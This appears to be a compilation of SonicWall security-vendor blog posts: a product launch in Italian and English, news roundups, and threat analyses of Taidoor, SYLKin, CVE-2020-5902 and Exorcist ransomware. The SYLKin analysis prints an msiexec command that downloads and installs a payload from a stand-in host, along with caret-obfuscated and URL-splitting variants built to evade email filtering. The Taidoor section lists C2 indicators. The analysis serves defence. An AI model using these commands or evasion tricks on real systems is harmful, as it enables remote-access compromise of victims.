Sicurezza, semplicità e valore con le nuove soluzioni SonicWall

Se ne parlava da anni: il futuro è il telelavoro. Il nuovo ufficio è dove ci si trova. L’era del lavoro in mobilità porterà nuovi livelli di produttività, flessibilità e soddisfazione del personale.

Ma nessuno aveva previsto che la rivoluzione del telelavoro sarebbe arrivata tutta in una volta, né che sarebbe stata inevitabile. Nel bel mezzo della pandemia l’adozione di politiche di telelavoro ha contribuito a garantire non solo la sicurezza dei dipendenti, ma anche la continuità operativa. Ma la nuova imponente schiera di lavoratori da remoto e in mobilità del tutto impreparati ha portato con sé rischi mai visti prima per quanto riguarda la cybersecurity.

Se qualcosa di fondamentale come il modo di lavorare a livello mondiale può essere cambiato per sempre, i concetti alla base della cybersecurity illimitata sono più attuali che mai. Le organizzazioni devono proteggersi dalla crescita esponenziale dei punti di esposizione e dai rischi legati al personale che lavora da casa e in mobilità.

Devono poter essere in grado di bloccare i ciberattacchi noti e quelli sconosciuti che cercano di sfruttare qualsiasi vulnerabilità indotta dalla nuova normalità operativa. Inoltre devono mettere in sicurezza e riprogettare le reti ampiamente distribuite, per non farsi trovare impreparate per un futuro completamente diverso.

Mentre il mondo dell’informatica si trova a dover affrontare di petto queste sfide, SonicWall sta rafforzando il suo impegno per una cybersecurity illimitata.

Il futuro della cybersecurity illimitata di SonicWall è incentrato sulla semplificazione dell’esperienza della sicurezza. Stiamo intervenendo in quattro modi principali:

  • Fornire un’esperienza utente innovativa, razionalizzare i controlli di sicurezza della rete e consentire la visibilità su tutta la rete con un’interfaccia moderna, intuitiva e di facile comprensione
  • Semplificare l’esperienza di sicurezza per le imprese distribuite e gli enti pubblici con una piattaforma più accessibile, flessibile e facile da installare
  • Offrire alle organizzazioni diversi modi per aumentare la visibilità e mantenere il controllo dei dati, identificando e bloccando i ciberattacchi noti e quelli sconosciuti che si verificano nella nuova normalità operativa odierna
  • Ridefinire l’amministrazione della sicurezza per semplificarla e renderla più accessibile grazie ai nuovi firewall TZ multi-gigabit compatibili con la modalità a sfioramento, dotati di funzionalità SD-Branch sicure e di una consolle di gestione nativa per il cloud riprogettata

Oggi annunciamo uno dei più importanti lanci di prodotti nella storia della nostra azienda. Complessivamente, si tratta di un sistema operativo completamente nuovo con cinque tra nuovi prodotti e migliorie apportate alle soluzioni esistenti per la piattaforma Capture Cloud, vale a dire:

  • SonicOS 7.0: razionalizza l’esperienza della sicurezza con un’interfaccia altamente intuitiva, garantendo la familiarità e riducendo le esigenze di formazione e i tempi d’installazione. L’interfaccia utente e l’esperienza dell’utente riprogettate rappresentano un valido compromesso tra praticità e controllo, con pannelli di controllo dei dispositivi, topologie riprogettate, supporto dell’app mobile SonicExpress e semplificazione della definizione e della gestione delle politiche.
  • SonicOSX 7.0: contribuisce a rendere più efficienti i governi e le imprese distribuite grazie ai maggiori livelli di modularità, protezione e controllo. Il sistema operativo migliorato semplifica le politiche, le verifiche e la gestione, offrendo maggiori livelli di visibilità grazie a un’interfaccia utente e a un’esperienza dell’utente appositamente concepite per i governi e le imprese distribuite.
  • SonicWall Network Security Manager (NSM) 2.0 SaaS: si caratterizza per una velocità, una modularità e un’affidabilità senza precedenti per la gestione completa dei firewall nelle grandi aziende distribuite. Il NSM nativo per il cloud consente alle organizzazioni di ottimizzare, controllare, monitorare e gestire da qualsiasi luogo decine di migliaia di dispositivi di sicurezza di rete, compresi i firewall, gli switch gestiti e gli access point wireless sicuri attraverso una semplice interfaccia cloud.
  • SonicWall NSsp 15700: dispone di diverse interfacce GbE 100/40/10, di funzionalità rivoluzionarie multi-istanza e di analisi delle minacce ad alta velocità, che consentono alle organizzazioni di proteggere milioni di connessioni senza compromettere la sicurezza. Progettati per imprese, governi, data center e società di servizi, questi firewall di fascia alta costituiscono una garanzia per il futuro degli investimenti, consentendo di modulare i sistemi di sicurezza in modo da soddisfare i requisiti di connessione dinamica in funzione dell’aumento costante del numero di dispositivi e di utenti.
  • SonicWall CSa 1000: rende disponibile il premiato servizio Capture ATP di SonicWall, offrendo ai governi, alle strutture di sanità pubblica e alle altre organizzazioni soggette ad obblighi di conformità o a limitazioni alla conservazione dei dati la stessa protezione di cui godono attualmente nel cloud. Potenziato con la tecnologia Real-Time Deep Memory InspectionTM (RTDMI), CSa 1000 è in grado di analizzare tutta una serie di tipi di file, individuando e bloccando le minacce di tipo exploit zero-day, i file sospetti e persino gli attacchi su canale laterale come Meltdown, Spectre, Foreshadow, PortSmash, Spoiler, MDS e TPM-Fail.
  • SonicWall TZ570 e TZ670: sono i primi firewall di tipo desktop dotati di interfacce multi-gigabit (5/10 G) per la connettività con gli switch SonicWall e altri dispositivi di rete per installazioni di tipo SD-Branch, il tutto con velocità di rilevamento delle minacce fino a 2,5 Gbps. Questi firewall di prossima generazione sono caratterizzati da sicurezza SD-WAN integrata, installazione di tipo Zero-Touch, compatibilità TLS 1.3 e 5G ed altre funzioni innovative, che consentono di ridurre i costi e risparmiare tempo.

SonicWall è da sempre impegnata a proteggere le PMI, le imprese e gli enti pubblici di tutto il mondo. Oggi è più che mai facile realizzare la vera cybersecurity liberandosi dalle pastoie del passato. Per ulteriori informazioni sui nuovi prodotti e sulle migliorie di SonicWall consultare il comunicato stampa, rivolgersi ad un consulente di sicurezza di SonicWall o controllare i prossimi aggiornamenti a cura dei nostri esperti in materia di sicurezza, che illustreranno più nel dettaglio le caratteristiche dei nuovi prodotti più importanti.

SonicWall significa cybersecurity illimitata per l’era iperdistribuita.

New SonicWall Solutions Deliver Security, Simplicity and Value

It’s been talked about for years: Remote work is the future. The new office is wherever you are. The era of mobile employees will bring new levels of productivity, agility and worker satisfaction.

But no one predicted that the remote-work revolution would arrive all at once — or that it would be mandatory. In the midst of the pandemic, adopting work-from-home policies helped ensure both employee safety and business continuity. But the massive new cohort of unprepared remote and mobile workers brought with it unprecedented cybersecurity risks.

While something as fundamental as the way the world does work may have changed forever, the ideals of Boundless Cybersecurity are more relevant than ever. Organizations need to protect against the explosion of exposure points and risks from remote and mobile workforces.

They need the ability stop known and unknown cyberattacks targeting any vulnerability in this new business normal. And they need to secure and rearchitect massively distributed networks in preparation for a future significantly changed.

As the IT world turns to face these challenges head on, SonicWall is stepping up its commitment to Boundless Cybersecurity.

The future of SonicWall Boundless Cybersecurity is focused on simplifying the security experience. We are delivering that in four key ways:

  • Provide an innovative user experience, streamline network security controls and deliver whole-network visibility with modern, intuitive and easy-to-understand interface
  • Simplify the security experience for distributed enterprises and government agencies with a more approachable, flexible and easy-to-implement platform
  • Deliver more ways for organizations to increase visibility and maintain data control while identifying and stopping the known and unknown cyberattacks persistent in today’s new business normal
  • Re-define security administration so it’s easier and more accessible with new zero touch-enabled, multi-gigabit TZ firewalls, secure SD-Branch capabilities and a redesigned, cloud-native management console

Today, we announce one of the most monumental product launches in the history of our company. In all, this effort includes a reimagined operating system and five new products or solution enhancements to the Capture Cloud Platform:

  • SonicOS 7.0 — Streamlines the security experience with a highly intuitive interface, ensuring familiarity, reducing training and slashing deployment times. The redesigned UI/UX balances convenience and control, offering device dashboards, redesigned topologies, SonicExpress mobile app support, and simplified policy creation and management.
  • SonicOSX 7.0 — Empowers governments and distributed enterprises with greater levels of scalability, protection and control. The enhanced OS simplifies policy, auditing and management — offering greater levels of visibility with a UI/UX designed for distributed enterprises and governments.
  • SonicWall Network Security Manager (NSM) 2.0 SaaS — Offers unprecedented speed, scalability and reliability for comprehensive firewall management across the largest distributed enterprises. The cloud-native NSM enables organizations to optimize, control, monitor and manage tens of thousands of network security devices — including firewalls, managed switches and secure wireless access points — from anywhere via a simple cloud interface.
  • SonicWall NSsp 15700 — Offers multiple 100/40/10 GbE interfaces, revolutionary multi-instance capabilities and high-speed threat analysis, enabling organizations to safeguard millions of connections without compromising security. Designed for enterprises, governments, data centers and service providers, these high-end firewalls future-proof your investment by allowing you to scale security to meet dynamic connection requirements as the number of devices and users continues to grow.
  • SonicWall CSa 1000 — Brings SonicWall’s award-winning Capture ATP service on-prem, giving government, healthcare and other organizations subject to compliance or data residency restrictions the same protection currently offered in the cloud. Enhanced with Real-Time Deep Memory InspectionTM (RTDMI), CSa 1000 analyzes a broad range of file types, detecting and blocking threats that target zero-day exploits, suspicious files and even side-channel attacks, such as Meltdown, Spectre, Foreshadow, PortSmash, Spoiler, MDS and TPM-Fail.
  • SonicWall TZ570 & TZ670 — Represents the first desktop firewall form factor to offer multi-gigabit (5/10G) interfaces for connectivity with SonicWall Switches or other networking devices in SD-Branch deployments — all with threat prevention speeds up to 2.5 Gbps. These next-generation firewalls feature integrated secure SD-WAN, Zero-Touch Deployment, TLS 1.3 and 5G support, and more innovative features that reduce costs and save time.

SonicWall’s commitment has always been to help protect SMBs, enterprises and government agencies worldwide. And now, it’s never been easier to realize true cybersecurity by breaking free from the constraints of the past. To learn more about SonicWall’s new products and enhancements, review our press release, contact a SonicWall security expert, or check back over the coming days as our security experts offer a closer look into each major new product.

SonicWall is Boundless Cybersecurity for the hyper-distributed era.

Cybersecurity News & Trends

This week, hackers dominated the headlines. But from financial firms, to voting machines, to entire countries, many are beginning to mount a stronger defense.


SonicWall Spotlight

AT&T Cybersecurity: Do Secure VPNs, Don’t Pay Ransoms — SDxCentral

  • The author notes that, per SonicWall’s mid-year update to the 2020 Cyber Threat Report, there was a 20% jump in ransomware globally in the first half of 2020 compared to mid-year 2019, including a staggering 109% spike in the U.S.

3 Tips For Improving Your Cybersecurity Program This School Year — EdTech Magazine

  • As schools prepare to reopen, EdTech Magazine offers three ways districts can improve their cybersecurity programs.

Covid-19 pandemic: Russian hackers target UK, US and Canadian research — Pharmaceutical Technology

  • Security services in the UK, US and Canada have determined that Russian cyber hacking group APT29 has attempted to illicitly access Covid-19 research. SonicWall CEO Bill Conner discusses how state-sponsored espionage groups are targeting medical data.

Cybersecurity News

Insecure satellite Internet is threatening ship and plane safety — Ars Technica

  • At the Black Hat security conference, researcher James Pavur presented findings that show that satellite-based Internet is putting millions at risk despite safeguards implemented by providers.

How the US Can Prevent the Next ‘Cyber 9/11’ — Wired

  • In an interview with WIRED, former national intelligence official Sue Gordon discusses Russian election interference and other digital threats to democracy.

U.S. Government Launches Cyber Career Path Tool — Security Week

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week announced the launch of a free tool designed to help users identify and navigate a potential career path.

U.S. coronavirus fraud losses near $100 million as COVID scams double — Reuters

  • U.S. losses from coronavirus-related fraud and identity theft have reached nearly $100 million, while complaints of COVID-19 scams have at least doubled in most states.

Financial Firms’ Cybersecurity Spending Jumps 15%, Survey Finds — Bloomberg

  • Big banks and other financial firms are spending 15% more this year to defend computer networks from cyber criminals, and the pandemic and work-from-home arrangements are probably spurring further increases.

Hackers Get Green Light to Test U.S. Voting Systems — The Wall Street Journal

  • Election Systems & Software, the top U.S. seller of voting-machine technology, is calling a truce in its feud with computer security researchers over the ways they probe for vulnerabilities of the company’s systems.

Hackers can abuse Microsoft Teams updater to install malware — Bleeping Computer

  • Microsoft Teams can still double as a Living off the Land binary (LoLBin) and help attackers retrieve and execute malware from a remote location.

Robots Running the Industrial World Are Open to Cyber Attacks — Bloomberg

  • According to a new report titled “Rogue Automation,” some robots have flaws that could make them vulnerable to advanced hackers, who could steal data or alter a robot’s movements remotely.

Interpol Warns of ‘Alarming’ Cybercrime Rate During Pandemic — Security Week

  • Global police body Interpol has warned of an “alarming” rate of cybercrime during the coronavirus pandemic.

CISA, DOD, FBI expose new versions of Chinese malware strain named Taidoor — ZDNet

  • U.S. government agencies say the Taidoor remote access trojan (RAT) has been used as far back as 2008.

Exclusive: China-backed hackers ‘targeted COVID-19 vaccine firm Moderna’ — Reuters

  • Chinese government-linked hackers targeted biotech company Moderna Inc., a U.S.-based coronavirus vaccine research developer, this year in a bid to steal data, according to a U.S. security official.

Hackers Are Targeting the Remote Workers Who Keep Your Lights On — Bloomberg

  • With many of the people who help keep the grid running now working from home, cyberattacks targeting the power sector have surged.

Hackers Broke Into Real News Sites to Plant Fake Stories — Wired

  • A disinformation operation broke into the content management systems of Eastern European media outlets in a campaign to spread misinformation about NATO.

In Case You Missed It

Chinese Remote Access Trojan Taidoor

Overview:

SonicWall Capture Labs Threat Research Team recently observed activity for the Chinese Remote Access Trojan Taidoor. Taidoor is composed of two stages, the loader and RAT module. The loader starts the service and decrypts the second file. The loader uses its export function “MyStart” for the initial infection. The function will allocate memory space for a new file called “svchost.dll”.

Before the new file is called it will have to go through a series of routines to decrypt the contents of the file. The DLL uses RC4 encryption, the key is actually rebuilt using the following sting: “ar1zyAXt7d6556sAsvchUQc2”. Once filtered, the RC4 key will be: “ar1z7d6556sAyAXtUQc2”.

The RC4 algorithm is also used to decrypt the import names and other related strings.

DLL Loader Layer, Static Information:

Checking binary static information… (Not Corrupted)…

PDB:

Exports:

DllMain:

RC4 Prefiltered Key:

Dynamic Information:

Looking inside “MyStart” Export Routine:

Creating the RAT module:

Once the svchost dll is allocated in memory it will cycle the exports and located the “Start” export routine in the new dll.

Calling the call routine to start the Remote Access Trojan module:

Network Artifacts:

Command and Control Information:

  • cnaweb.mrslove.com
  • 210.68.69.82

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

  • GAV: Taidoor.LD

Appendix:

Sample SHA256 Hash: 4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4

Fake Chinese Word Processing App installs an Infostealer Trojan

The Sonicwall Capture Labs Research team has come across a Chinese word processor that comes packaged with an infostealer. This word processor comes as a Nullsoft installer and appears to be a legitimate notepad or Word application alternative.

Infection Cycle:

This Trojan comes as an NSIS installer and uses the following icon:

Upon execution, it guides the user through a typical software installation prompts and then launches the word processing app window.

However, upon further inspection, it appears that it launched the word processing app alongside another copy of AllRoundPad.exe.

Simultaneously, several connections to remote servers were made.

This Trojan has accessed personal information including browsing history, user IP, location among others. It also attempts to access and modify the system’s internet settings.

It creates .tmp files in the %temp% directory with information gathered regarding the victim’s machine. These are then later sent out to a remote server.

This installation comes with an uninstaller. However using the uninstaller only removes the word processing app and leaves behind a copy of the Trojan in the %temp% directory which is responsible for all the malicious behaviors observed.

We urge our users to only use official and reputable websites as their source of software programs. Always be vigilant and cautious when installing software applications particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Chindo.AB_4 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

What’s the Malware Capital of the US?

A lot of the dangers in the U.S. follow logical and predictable patterns. If you want to avoid tornadoes, you shouldn’t live in Oklahoma, Kansas or Nebraska. If you’re worried about hurricanes and earthquakes, you should avoid the East Coast and West Coast, respectively.

And while dangers such as traffic accidents and property crime are more dynamic and complex, these issues are studied at length, with data released periodically on what areas have shown increases and decreases. In short, it’s easy to find out what sorts of dangers one might encounter in a given area in order to prepare accordingly.

While the damage from cybercrime isn’t as immediately visible as the damage from things like drought and flood, it still has the potential to be extremely devastating and costly. According to the FBI, cybercrime cost individuals and businesses a staggering $3.5 billion in 2019 alone.

To help organizations better assess their risks, SonicWall Capture Labs threat researchers continually monitor cybercrime and release the data collected in reports, such as the recently released mid-year update to the 2020 SonicWall Cyber Threat Report.

The threat research gathered during the first half of 2020 offers insight into not only what modes of attack criminals are using, but also what areas they’re targeting. While no city or state has a monopoly on (or immunity from) malware, there were some notable hotspots. From January to June, researchers identified 304.1 million malware attacks in California — more than 100 million more than in the next-highest state (New York.)

So that means businesses in California see a lot more malware, right? Not so fast. According to the Census Bureau’s Survey of Entrepreneurs, firms with fewer than 500 employees accounted for 99.7% of employer firms in the U.S. — and California has by far the largest number of such businesses (791,268 out of 6.4 million total for the entire U.S.).

Simply put, there’s a similarly massive number of endpoints, networks and sensors. In terms of states where any given person is most likely to encounter malware, California is actually tenth … from the bottom.

We call this phenomenon “malware spread.” Knowing the total malware is useful — it allows us to compare year-over-year trends for a given area. But it doesn’t tell us much about the odds a particular person will encounter malware.  For that, we need to calculate the malware spread, or the percentage of sensors in an area that saw a malware attack. The greater the malware spread percentage, the more widespread malware is in a given region.

It can be useful to think of malware totals vs. malware spread in terms of how we think about rain. Knowing the total rainfall for a defined area is useful, but it doesn’t tell us whether we’re likely to need an umbrella. For that, we need the Probability of Precipitation, or “chance of rain.” Like the malware spread percentage, this calculation takes into account a number of other factors to provide a more meaningful risk assessment.

To find the state with the highest malware spread, you’ll need to travel 1,523 miles east, to Kansas. Nearly a third of organizations there, or 31.3%, saw malware. (For comparison’s sake, fewer than a quarter of those in California — 24.1% — did.) Moreover, there’s a significantly higher risk of malware in Kansas than in the second-riskiest state, Montana. The percentage decrease between Kansas and Montana is greater than the percentage decrease between Montana and the ninth-riskiest state (Louisiana).

Using the same data set, we can also determine the least-risky states for malware. Here, North Dakota takes top honors — only 21.9% of organizations here saw malware. Georgia, Texas, Maine, New York, Arizona, Missouri, Alaska, Minnesota and California rounded out the list of top 10 safest states in terms of malware.

It’s tempting to try and find commonalities among the riskiest and least risky states, but it’s not likely to yield much more than frustration. For example, the list of riskiest states includes states in the heartland, but also Hawaii — the most coastal state there is. Three of the top five most populous states are on the “least risky” list, but so is Alaska, which is No. 48 — and Florida, the third-most populous, appears on the “riskiest” list. Similarly, each list includes both northern states and southern states, hot states and cold states, red states and blue states. The state malware rankings don’t even line up with the rankings for ransomware risk.

At first glance, this randomness might suggest there are no lessons that can be taken from this data. On the contrary: That is exactly the lesson. There is no “cybercrime capital.” There are no safe harbors. Anyone can be targeted by cybercrime, but the good news is that, with proper safeguards, compromise can be prevented.

Protect Against SYLKin Attack with SonicWall Cloud App Security

With the definition of normal changing with each passing day, the ongoing pandemic has forced security professionals to re-evaluate new working models and how they can prevent attackers from targeting end users. Albert Einstein once said, “In the midst of every crisis lies great opportunity,” and this idea has formed the basis for how cybercriminals operate in the era of COVID-19.

Never ones to let an opportunity go to waste, cybercriminals are deploying new attacks each day. Microsoft was recently affected by a new SYLKIN Attack that bypasses both Microsoft 365 default security (EOP) and Microsoft advanced security (ATP). At the time of writing, Microsoft 365 is still vulnerable, and the attack is still being used extensively against Microsoft 365 customers.

Lately Avanan’s security analysts have detected a significant increase in the usage of SLK files in attacks against Microsoft 365 customers. In these attacks, hackers send an email with a .slk attachment that contains a malicious macro (msiexec script) to download and install a remote access trojan.

It is a very sophisticated attack with several obfuscation methods specifically designed to bypass Microsoft 365. Gmail customers, on other hand, are safe from this attack — Google already blocks it on incoming email and has made it impossible to send these SLK files as an attachment from a Gmail account.

What is SYLKin attack?

Again, SLK files are rare, so if you have received one in your inbox, chances are you are being targeted by the most recent Remote Access Trojan malware that has been ‘upgraded’ to bypass Microsoft ATP. The attack method itself has been extensively documented, so I’ll only explain it briefly. The focus will be on how such a well-understood attack bypassed Office 365 filters, including Microsoft ATP.

The attack specifically targets Microsoft 365 accounts and until recently, was isolated to a small number of organizations.

Emails are targeted and manually created

The attack emails are highly customized, using information and language that could only have been found and written manually. The messages seem to come from a partner or customer using a topic that is highly specific to the organization and the individual. For example, an email to a manufacturer will discuss parts specifications, an email to a tech firm will ask for changes to a large electronics order, or an email to a government department will discuss legal concerns. The subjects, contents and even the attached files are customized with the target’s name and organization. No two are alike. What they have in common is that the messages are realistic and compelling enough to convince a user to click on the attached SLK file.

What is a SLK file?

A so-called “Symbolic Link” (SLK) file is Microsoft’s human-readable, text-based spreadsheet format that saw its last update around the time that “Dallas” went off the air in 1986. At a time when XLS files were proprietary, SLK was an open-format alternative before XLSX was introduced in 2007. To the end user, a SLK file looks like an Excel document — but for an attacker,  it’s an easy way to bypass Microsoft 365 security, even for accounts protected with Microsoft ATP.

What does this attack do?

A recent version of the SYLK attack includes an SLK file with an obfuscated macro designed to run a command on a Windows machine:

msiexec /i http://malicious-site.com/install.php /q

This runs Windows Installer (msiexec) in quiet mode to install whatever MSI package they decide to host on their site. In this campaign, it’s a hacked version of the off-the-shelf NetSupport remote control application, granting the attacker full control over the desktop.

Windows grants more trust to SLK files than XLSX files

Because Windows “Protected View” does not apply to SLK files downloaded from the Internet or from email, Excel does not open them in read-only mode.

When opening an SLK file, the end user does not see this message:

Targeted methodology to bypass Microsoft Advanced Threat Protection

The first versions of the SLK attack method were seen in 2018 and were eventually blocked by Microsoft ATP. This new campaign, however, includes a number of obfuscation techniques specifically designed to bypass Microsoft ATP.

  • The attack was sent from hundreds of free hotmail accounts
  • The macro script includes ‘^’ characters to confuse ATP filters.
  • The URL was split in two so that ATP would not read it as a web link,
  • The hosting server became active after the email was sent so it seemed benign if sandboxed by ATP,
  • The hosting server only responded to “Windows Installer” user agents, ignoring other queries.

These methods are ATP-specific. Again, Gmail blocks these files and, in fact, makes it impossible to send from a Gmail account.

The attackers took advantage of a series of blind spots in the Microsoft email infrastructure to send this attack from thousands of disposable Hotmail accounts, with email addresses in the format “randomwords1982@hotmail.com,” each sending just a handful or messages at a time.

An important benefit of Hotmail to many attackers is that the same security filters are being used end to end. If the attacker is able to attach and send a file, it is likely that it will make it through the entire Microsoft security infrastructure. Should one of the accounts get flagged, Microsoft will disable it, informing the attacker that his messages are getting caught downstream.

While most of the well-known anonymous email-sending engines deserve their poor spam and phishing reputations, Hotmail users benefit from Microsoft’s own reputation. Since the service was merged with its own Outlook application, Microsoft seems to grant them a higher level of trust than external senders.

The macro script includes escape characters to confuse ATP filters

The attackers take advantage of the fact that ATP filters do not interpret text in the same way as the Windows command line. ATP would normally be able to identify the powerful and potentially malicious msiexec command, but the attackers inserted command-line escape characters ‘^’ to obfuscate the script.

msiexec /i http://malicious-site.com/install.php /q

becomes

M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q

When read by Advanced Threat Protection filters, the msiexec command becomes unreadable and the telltale ‘http://’ is obscured.

When read by the desktop command line, the escape characters ‘disappear,’ running as if they were never there. This is just a command-line version of the Zero-Font methodologies that have plagued ATP for years.

The URL was split into two macros so that ATP would not read it as a link

ATP does not need to see the ‘http://’ to recognize a web link and would normally catch any text of the format ‘malicious-site.com.’ In order to hide the link, the attackers split it into two separate commands.

The first macro command creates a batch file with the first half of the URL.

Set /p=””M^s^ie^xec /ih^tt^p^:^/^/malicious-sit”” > JbfoT.bat

The second macro command adds the remainder of the URL and then runs the batch file.

Set /p=””e.com/install.php ^/q”” >> JbfoT.bat & JbfoT.bat

Within seconds, the malicious SLK file has run two simple commands to create a malicious install script and begin installing whatever software the attackers decide to host.

The hosting server was armed after the message was sent

We don’t believe Microsoft ATP is testing these files within their sandbox environment, relying instead on static filters. But we have found that other vendors have also failed to catch this attack, even when the code is executed in a virtual environment.

There is no special code or intelligence within the script to detect if it is running within emulation. Instead, the attackers do not enable the malicious web server until shortly after the email is sent. Because it cannot reach the server, the script fails, installing nothing.

In addition to enabling the URL only after delivery, the server would become inactive a few hours later, rejecting further queries. This seems to be a way to avoid action from their provider, as the reported content is no longer available at the links associated with the attack by the time a manual take-down notice is requested.

The coordinated timing of the hosting servers with the sending of the emails is characteristic of a more sophisticated campaign. When combined with the high-profile nature of the targeted organizations, it suggests an APT group or state actor.

The hosting server only responded to requests from “Windows Installer” agents

In addition to their on-and-off timing, the hosting servers utilized another common technique to avoid analysis, rejecting all queries except for those with User Agent: Windows Installer. This ensured that it only responded to the malicious script and would avoid detection by URL analysis tools.

How did it evade Microsoft protection?

Each of the obfuscation methodologies were designed to bypass a specific layer of the Microsoft 365 security infrastructure. While we understand how each was used in turn, we are still confused as to how ATP fails to detect this technique in emulation. Creating a batch file and calling the msiexec application is considered malicious, even if it fails to run. We must assume, then, that none of these files are being tested by the sandbox layer. Unfortunately, because each file is unique, no two attachments have the same MD5 hash, which requires each file to be given additional scrutiny.

Got SonicWall CAS protecting your inbox? Don’t worry, we have you protected.

If you have SonicWall Cloud App Security protecting your organization’s inbox and you are running in Protect (Inline) mode, this attack is blocked, and users will not see these attacks in their inbox. (If you are in Monitor Mode, we recommend that you move to Protect (Inline) mode.)

Alternatively, we recommend you configure your Office 365 account to reject files of this type. SLK files are relatively rare, so unless you have a legacy reason to allow them, we recommend excluding the SLK extension as a static mail-flow rule, at least until Microsoft fixes this gap.

Microsoft’s recommendations are much more complicated but are another alternative to protect the desktop.

CVE-2020-5902: Hackers actively exploit critical Vulnerability in F5 BIG-IP

BIG-IP

F5’s BIG-IP is a product family comprises software, hardware, and virtual appliances designed around application availability, access control, and security solutions. BIG-IP software products run on top of F5’s Traffic Management Operation System® (TMOS), designed specifically to inspect network and application traffic and make real-time decisions based on the configurations given. BIG-IP Configuration Utility is a Web GUI for F5 users to set up the BIG-IP product and to make additional changes.

Vulnerability | CVE-2020-5902

BIG-IP Web GUI is accessible over HTTPS on port 443/TCP via the following URL: https://<BIG-IP server>/tmui/login.jsp

A directory traversal vulnerability exists in the F5 BIG-IP product family. This is due to insufficient validation of the URI within the HTTP requests. By using a semicolon in URI, a remote attacker can bypass the access control policy set up on Apache and forward the malicious URI to the Tomcat backend server. When Tomcat normalizes the URI, any string followed by a semicolon will be ignored. The root cause of the vulnerability is how Apache and Tomcat parse the URL differently, allowing users to bypass the authentication and invoke JSP modules. Successful exploitation allows unauthenticated remote attackers to access the internal java binaries on the vulnerable server.

The following internal JSP files are wildly used to compromise:

/tmui/tmui/locallb/workspace/tmshCmd.jsp
/tmui/tmui/locallb/workspace/fileRead.jsp
/tmui/tmui/locallb/workspace/fileWrite.jsp

Exploit:

We observe the below http exploit requests targeting F5 BIG-IP servers vulnerable to CVE-2020-5902.

Impact:

A quick search on Shodan reveals more than 6000 BIG-IP servers exposed publicly over the internet. Over 2000 of those servers seem vulnerable to CVE-2020-5902.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15070 F5 BIG-IP TMUI Remote Command Execution

Affected Products:

BIG-IP versions 11.6.1 – 11.6.5, 12.1.0 – 12.1.5,  13.1.0 – 13.1.3, 14.1.0 – 14.1.2, 15.1.0 and 15.0.0 – 15.0.1 are affected by this vulnerability.

Find vendor advisory here

IOC:

Attacker IP’s:

195.54.160.115
207.180.201.51
222.172.157.32
172.31.48.102
222.172.229.58
182.245.198.246
172.105.149.194
27.115.124.75
27.115.124.10
111.206.250.198
27.115.124.74
182.245.199.208
111.206.250.235
111.206.250.230
64.39.99.67
157.43.37.216
49.206.2.81
111.206.250.236
111.206.250.229
115.236.45.236
115.238.89.37
111.206.250.197
27.115.124.9
180.169.87.53
61.166.216.165

Cybersecurity News & Trends

This week, ransomware attacks on U.S. governments, the energy sector, sports teams and smartwatch maker Garmin made headlines — and with cryptocurrency on the rise, more may be in store.


SonicWall Spotlight

Malware is Down, But IoT and Ransomware Attacks Are Up — TechRepublic

  • Malicious attacks disguised as Microsoft Office files increased 176%, according to SonicWall’s midyear threat report.

Sharp Spike in Ransomware in U.S. as Pandemic Inspires Attackers — ThreatPost

  • COVID-19 has changed the face of cybercrime, as the latest malware statistics show.

Inactive wear! Smartwatch maker Garmin suffers widespread outages after ‘ransomware attack’ – leaving thousands unable to track their workouts — Daily Mail

  • According to Bill Conner, the combination of remote internet connections and less secure personal computers has increased organizations’ risk of being compromised.

Smartwatch maker Garmin suffers outage after ransomware attack — The Telegraph

  • SonicWall found that there had been a 20% increase in the number of ransomware attacks in the first half of the year, to more than 120 million.

HoJin Kim Named as part of CRN‘s Top 100 Executives Of 2020 list, we highlight 25 sales executives leading the channel charge — CRN Award

  • Kim has revolutionized pricing for MSSPs, with a pay-as-you-go model for SonicWall’s software products that delivers a cost savings of 20% over buying an annual license.

Cybersecurity News

FBI warns of Netwalker ransomware targeting US government and orgs — Bleeping Computer

  • The FBI has issued a security alert about Netwalker ransomware operators, advising victims not to pay the ransom and to report incidents to their local FBI field offices.

Russia’s GRU Hackers Hit US Government and Energy Targets — Wired

  • A previously unreported Fancy Bear campaign persisted for well over a year — suggesting the notorious group behind the attacks has broadened its focus.

UK govt warns of ransomware, BEC attacks against sports sector — Bleeping Computer

  • The UK National Cyber Security Centre has highlighted the increasing number of ransomware, phishing and BEC schemes targeting sports organizations.

Bitcoin rises above $10,000 for first time since early June — Reuters

  • After several weeks of trading in narrow ranges, Bitcoin has breached $10,000 for the first time since early June.

Feature-rich Ensiko malware can encrypt, targets Windows, macOS, Linux — Bleeping Computer

  • Threat researchers have found a new feature-rich malware that can encrypt files on any system running PHP.

CISO concern grows as ransomware plague hits close to home — ZDNet

  • An increasing wave of cybercrime targeting Fortune 500 companies is starting to ring alarm bells.

BootHole GRUB bootloader bug lets hackers hide malware in Linux, Windows — Bleeping Computer

  • When properly exploited, a severe vulnerability in almost all signed versions of GRUB2 bootloader could enable compromise of an operating system’s booting process even if the Secure Boot verification mechanism is active.

OkCupid: Hackers want your data, not a relationship — ZDNet

  • Researchers have discovered a way to steal the personal and sensitive data of users on the popular dating app.

US defense contractors targeted by North Korean phishing attacks — Bleeping Computer

  • Employees of U.S. defense and aerospace contractors were targeted in a large-scale spearphishing campaign designed to infect their devices and to exfiltrate defense tech intelligence.

In Case You Missed It

Exorcist ransomware casts triple punishment for non-payment. CIS countries spared.

The SonicWall Capture Labs threat research team have observed reports of new ransomware named Exorcist.  It is reported to have surfaced over the past week on an underground Russian forum using the ransomware-as-a-service (RaaS) model with 30% commission retained by the creator.  The initial cost of file retrieval is $500 USD (in Bitcoin) but, increases by a factor of 3 if payment is not made within 48 hours.

 

Infection Cycle:

 

Upon infection, files on the system are encrypted and given a random six character ([A-Z][a-z]) extension eg. “.GyQUfe”.  The following image is displayed on the desktop background:

 

The malware drops the following files onto the system:

  • %APPDATA%\Local\Temp\boot.sys (0 bytes)
  • %APPDATA%\Local\Temp\msdt (0 bytes)
  • %APPDATA%\Local\Temp\d.bmp
  • GyQUfe-decrypt.hta (all dirs containing encrypted files)

 

